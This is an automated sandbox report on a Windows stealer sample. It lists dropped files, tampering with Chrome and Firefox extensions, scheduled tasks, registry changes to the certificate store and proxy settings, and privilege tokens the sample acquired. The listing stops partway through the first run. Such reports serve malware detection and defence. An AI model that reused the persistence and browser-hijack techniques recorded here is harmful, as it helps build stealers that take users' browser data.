Malware Analysis Report

2025-06-15 19:50

Sample ID 240406-fnl4wsbc5z
Target 106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035
SHA256 106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035
Tags
discovery spyware stealer
score
8/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
8/10

SHA256

106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035

Threat Level: Likely malicious

The file 106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035 was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Checks BIOS information in registry

Reads user/profile data of web browsers

Drops Chrome extension

Drops desktop.ini file(s)

Checks installed software on the system

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-06 05:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-06 05:01

Reported

2024-04-06 05:03

Platform

win10v2004-20231215-en

Max time kernel

92s

Max time network

96s

Command Line

"C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\zZhIfWQ.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\MaoGuRf.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\jafxhIg.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\VDiAXGzPiWUn\ArsUktk.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\CoPIfj.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\eCqoOPyISfQjJ.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\fsBGcRk.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\tdfVGAH.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\DXIODRJ.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\aJtOsWq.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bpJjqbWMDOjxkYrvBb.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\MWViHNuTpmRlpInKg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\wbeMFPOaxEodGIM.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BinjFlxHFUMMGNOij.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{14f6f45c-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{14f6f45c-0000-0000-0000-d01200000000} C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Occurrences
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A 8
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A 2
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe N/A 54

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
